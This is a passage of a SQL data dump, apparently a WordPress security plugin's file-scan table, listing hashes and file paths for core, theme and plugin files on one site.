/dashboard/widget_ips.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4f2421d39c418b7d5704463b7d89e186b91d0580','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-user.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4f381916ace051d364582d8bd77fdc9ec6e68213','/home/westonspirit.org.uk/public_html/wp-blog-header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4f3dc43060dd597d991a14082db4045a5970bd86','/home/westonspirit.org.uk/public_html/wp-admin/ms-options.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4fb2e7df0dd2cada87d990764c70072d3a9e51eb','/home/westonspirit.org.uk/public_html/wp-includes/registration-functions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4fc94562d63ecb1be360b0b898029b48e5487185','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4fe0237fe30a1689eda59dbdbb6b4fe215d39034','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-language-pack-upgrader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4fe590d76a7ce4758367198b6ce1fcf154f2e51e','/home/westonspirit.org.uk/public_html/wp-includes/ms-load.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'500e112c719912bde4afc18bf6f9cc8e65748009','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/editor/data/globals/endpoints/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'501cac3480a068984b875dd9fada80e981bc6099','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'50dd912ebbc5cb2bad7e8bbd3212ded5f9b6a323','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/dashboard/widget_logins.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5113a0d818704c76a0d64e0f7144be7dec211863','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'514555eef8a50703e73cf6974d2f45aa6f8cc379','/home/westonspirit.org.uk/public_html/wp-login.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'514637835a7429868a3c7932647ba89008e42c82','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-file.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5152466bbfab83e1b2319fc3af7d600b487d8204','/home/westonspirit.org.uk/public_html/wp-includes/general-template.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'518593287dbabb4e2ae54d8b26e697f628978e1b','/home/westonspirit.org.uk/public_html/wp-admin/network/update-core.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'51d32f3b98004e068ad20f5b5e371aecc07dc47c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/diagnostics/text.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'51e6daa713eafaab4423d642e96a2e1ab02acb07','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/rollback.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'51e7cd9c35b095412ca08804fbb411c65f25f69e','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/singular.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'51f3eb20c910d82e94ba723aeb8c1d8ae560efaa','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'520a0bf64dfe6848bd8c8ac7d603ff658f1003a6','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'52327c9f9ffa18e6082e194ff904b419c0f983df','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/template-parts/content-search.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'526d89cb114c3069e937290b907a4e2d4eea1a0a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'527833c0d1406da7fcc0a89f60ab2100d20db451','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/inc/block-patterns.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'52ed0399c6e028b8c9005255c3f930c8e3837b50','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'530228e8abeb246c5a5232572417a0f2cb4d0b88','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'53061b6892c9860657a2afa2a630acd6cf3ddf6a','/home/westonspirit.org.uk/public_html/wp-includes/compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5323b2dbfd459f8b5fc5cdb0953e75ef9dd532b7','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/code.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'533e94f55e2bf72732f9b45110249f4168e8c858','/home/westonspirit.org.uk/public_html/wp-admin/network/privacy.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'536199aa8dca67522c6db391a46b29cd2d44a418','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'538778f999393cf02124b0b0e1f5b4f780cc4460','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'538fb5e09830eee5b3bcb1c4ff6136c88acef391','/home/westonspirit.org.uk/public_html/wp-includes/block-supports/colors.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'53a956cdc5f1dc473d8fbe15e53f6b45c111dc1b','/home/westonspirit.org.uk/public_html/wp-includes/js/tinymce/wp-tinymce.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'53be10aaa8e07e968d3b5c25d12f9f6358707e42','/home/westonspirit.org.uk/public_html/wp-admin/includes/bookmark.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'53e4ac229e283dc014eb37f62ead5eb56f491b84','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-background-image-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'540ce619e20c1d9ceeac26a8beb13d92861ac1c6','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'54a42c8b11dda2f645f010ae869b1186c4b74192','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/inc/back-compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'54b740fb89017becc9b8eaad0701efb0fd2d75d3','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'54c50a134cc022a63c57c8192bc854111fe9422c','/home/westonspirit.org.uk/public_html/wp-includes/class.wp-dependencies.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'54de5225248ab39a59615f9ed7bb74933562583d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/upgrade/manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'54e0e828cec57271a52433ef1c696bdb5ad3afe6','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/File.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'554069dfe735c6c733d06c91eeee2de953b90652','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/schema/201.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'555672e14495de61ffad4fb546229278bd0bfe84','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfCredentialsController.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5580fed424ad3e0ce8c2389e7c95b98d607c5e06','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/indeterminate-progress.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'55a5c2dad6efe2d287d347748b59235aef9db22f','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'55bce046d14308bba92bc47c2a1c33731607090a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'55c459e4e6c4b8cce29172cbd5f8f40c0e4cbcd3','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'55cbe6c3664a3ee554f6e428bf5348b3b3183eba','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/redirect/redirect.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'55d87a5c52b791959f3c5d53b7767b6338ef3f6c','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filesystem-menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'56290ad0739afdd3033cc11624fffa31216023aa','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/diffResult.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5629b0080394480f89178e560dea30f0114fced2','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_support.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'56e5f433d79f502596bb979fc511c149e26d6f2b','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/kit-library/data/kits/endpoints/favorites.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'56f014f46ab44c33fc288cfe3f21cd080dd1264b','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-pages.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'570331e54aab31f076c7faab1786749ad086b465','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/onboarding/overlay.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'573daf4e034390f2b43c1a2c548852b87a6d5a40','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/select2.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'57470c3269b7203f1a5886fc2505476caa688927','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'57757035e3ddad62addd99aa58bb320fb96d40f9','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/htaccess.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'577e7f48cf3a5d7e70a9f7c673fd73bd87701261','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wf503.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'57c549078fa582f25915bea491ab21dc0bd6da09','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-walker-nav-menu-edit.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'57c5edc6532a52de4725193f3b7fa4da93f54c7c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/debug/loading-inspection-manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'57d0c45320e8d7bb1ebe27ed9f741bb968880a7a','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/single.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'57d5ac8298b0f8ba2a180ab99aae5ca31694acc7','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/logger/items/base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'582fc5274dbaff38e61aa84b25cc047d99f10b8d','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-nav-menus-panel.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'58597e587483d1c137fbb558e78f6e695f2c1783','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/settings/tools.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'585cb129d5a484e993a53a6f159044ce997d552f','/home/westonspirit.org.uk/public_html/wp-includes/update.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'58722084daf849c31ece94c643036567015392cb','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'587b38f4f4dacf2a85c9aca966df34919ceaab98','/home/westonspirit.org.uk/public_html/wp-admin/ms-admin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'58819a007129629384b3cda72af817eb84169afc','/home/westonspirit.org.uk/public_html/wp-admin/freedoms.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'58880288d46abc65fe6d42f32f512ce48ba0b045','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/read-more.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5896885fa8c68150d107a86e2db0bc144ecb9922','/home/westonspirit.org.uk/public_html/wp-admin/install.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'58f39a30d7a0c51cb5f9e2910862c466d7389810','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/system-info/reporters/mu-plugins.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'58f9c804d3ad1ff571121c32b7e17a813759d3dd','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5903d2c3ee86f73a91d3d97ea5207e52e7ede47e','/home/westonspirit.org.uk/public_html/wp-admin/options-discussion.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'593b02360ba062403bc53cd3f045e3726c2937c2','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/lib/sodium_compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'59586bdcad39ad76a8430596331a5beddd027b35','/home/westonspirit.org.uk/public_html/wp-includes/feed-atom-comments.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5959d9905a85b362d3ed8138a1a526e4926f178c','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5998eccbbb5e48319ae454ff1a2e3cc768d1270f','/home/westonspirit.org.uk/public_html/wp-admin/privacy.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5a0775f7d3eb9f746606577a2f024b3d76861847','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/data/base/sub-endpoint.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5a0b62ea75e0779e07be9d375b67231e6104e38f','/home/westonspirit.org.uk/public_html/wp-admin/includes/image-edit.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5a563c8b9415a5ba3d2965dece5012205353ccfd','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.audio-video.riff.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5a5bf5a57be55804ac7cfa519eca9556491325ec','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5a61dd8c3d35e5c723c692e185e0ef6e1456039c','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-screen.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5a9c2e02cdb83e2a072f58d2d7089c0b276d533d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/dashboard/option-howgetips.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5a9d609768f510c11ecba7db166928ed34a0ee42','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-term.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5abbb2eef5198b235048e0bfe788dda76b10f853','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5acd9688a4bbeef3c032f755994c1041e9a42bd3','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_tools_importExport.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5af4dc08051248ae349009a0fc18181b5d224372','/home/westonspirit.org.uk/public_html/wp-admin/admin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5b003aed78bdc6c58af9f5e24dc2654b1337e4ea','/home/westonspirit.org.uk/public_html/wp-admin/network/freedoms.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5b253cf6627f4277fd607d2d1b28aa550343cf60','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5b2b3fef6aaa4f80d266c25c5efcedc8ee1020a3','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-site-icon-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5b4d1c8c7db887e04353f429c96a81b737b5b931','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/wp-cli/cli-logger.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5ba04c23167a6c7b15d205cc5fc86f1b80dca183','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/manage/code.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5bc585da6504d69c32374c683df1693034f260dd','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/url/url-query.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5bcd927241f907d41fd2827592ac638084940e86','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5bd6381fd616ea245bcf697b2c47bf7beb2d9887','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5bf7b7c3f85a01fc096d23fb0a08d65afe15f146','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-image-editor.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5bf8c6fb10725ff9f935826c42b491dc15a7d685','/home/westonspirit.org.uk/public_html/wp-includes/capabilities.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5c1baf50444cc7379b4c37badfc7a63b54d204a5','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/fileio/apache.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5c2936dde0ab21fe3c370d5e6d025c289386bde8','/home/westonspirit.org.uk/public_html/wp-admin/edit-form-blocks.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5c33d76ae010db831142276eef87ab6b76889f32','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-themes-list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5c75f2039c81e0c12b5096095a33b4350445a5de','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-http-ixr-client.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5cdb889cc10f113083b120cac5f24069605489e8','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/search.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5cdec8109fc5960f9f81d34202d6e163f91413ff','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfDB.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5ce4a07afaa947bc7e5223def285a5f88e7cfa3b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5ce660b584c91fa1e0630036b99ea9d061434bc5','/home/westonspirit.org.uk/public_html/wp-includes/cache-compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5cfe7d45338867cefafa1d17511ed1e2277dafaf','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/Base64/Original.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5cfebda51f71030781f359d8c219853bfbad705c','/home/westonspirit.org.uk/public_html/wp-includes/block-supports/custom-classname.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5d057ad74deeb3ff58f5c7012f669304fbbdd3ea','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-permanent-blocked-ip.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5d5b3545fa0b94b8573e1eab9ffcc7f31e54c0f5','/home/westonspirit.org.uk/public_html/wp-includes/error-protection.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5d9317e7dd19e97679eecddb8088e3c680bb0384','/home/westonspirit.org.uk/public_html/wp-includes/bookmark.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5d966a66b240da131ae54a38d33f413ae661c381','/home/westonspirit.org.uk/public_html/wp-admin/edit-comments.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5db8e21ab778fa576702ce416ec9c114d4ab9c03','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5dd69860f4c44af5e46db39c1e8696b60cf5791a','/home/westonspirit.org.uk/public_html/wp-admin/term.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5de3383209abf9efc6f3876b560516b30adf648a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfRESTAPI.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5de7d612809d2523549020924f79377c9d2c2a2e','/home/westonspirit.org.uk/public_html/wp-includes/vars.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5deadf6f30aeb520ae1c86c84d2f890b35d30137','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5dee203c925b13a6ea8752c44a335b9049a5c235','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.audio-video.asf.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5e0a3a790fe69a0389ec50e7b25a4a2f4279d9cc','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-brute-force-menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5e152236fb3f71288b18e2949817edb44dc0c3bd','/home/westonspirit.org.uk/public_html/wp-admin/includes/admin-filters.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5e56ef1be8f0f7cfa228c25991d75800eacae374','/home/westonspirit.org.uk/public_html/wp-admin/network/about.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5e65a1692ac4662f011424d406a84574397e27ff','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/data/base/processor/before.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5e6ae51fa279a769e255566eed54b61478c98952','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-widget-form-customize-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5e77172681fb76c3557dc111c89bdab071f8eeba','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-process-renamed-login-page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5e7a118aea3f6ef45b477810f49ea24ce139b088','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/logger/items/js.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5e9288909c660ec50f6e03add3b1fc40ea591505','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/redirect/redirect-options.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5eb784905c30bf72724f776ab10d5b4ea77af2fb','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/File.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5ec5af8c88cc4f6e712c31517312b0157f347fc9','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-term-query.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5f132b9db270b967d33014776def1c17698c5bc0','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-file-scan.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5f173cab45baf2a668d479713a949a894164ef89','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/dashboard/status-renewing.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5f1b17fe97c7e83bafca04bf7eadb80879b480be','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-header-image-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5f1dc0f54050717a7a09861509995bbdb2d1c632','/home/westonspirit.org.uk/public_html/wp-includes/class-smtp.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5f3088633baafd9d2ca969f64789d219c3b4d8c0','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/SipHash.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5f35aa4dc21e92cfc9d3c4c40f14e83d78220a5e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/options/option-toggled-segmented.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5f3db90a4fb5dbb81fed9e5ddf5a9bbb63a0c3bf','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/frontend/render-mode-manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5f562df984ee4f7241db355267505ee648d1b926','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/HChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5f703a386c8c0f05ce0d3062750f82f212b24aa4','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/redirect/redirect-filter.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'5fd95157b71dd039a2727957c2478c6e6cd0229d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/dimensions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'60030e470992d10be93f08a60451167dfe753cc3','/home/westonspirit.org.uk/public_html/wp-admin/includes/credits.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'600ab237f240963007b059ccb36dc49da26651bc','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/hidden.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6025277bc11d894dbb9fec904ee9fabc5f993d49','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6026e70a264033664cdef5fdebf04656d0eeaddc','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-w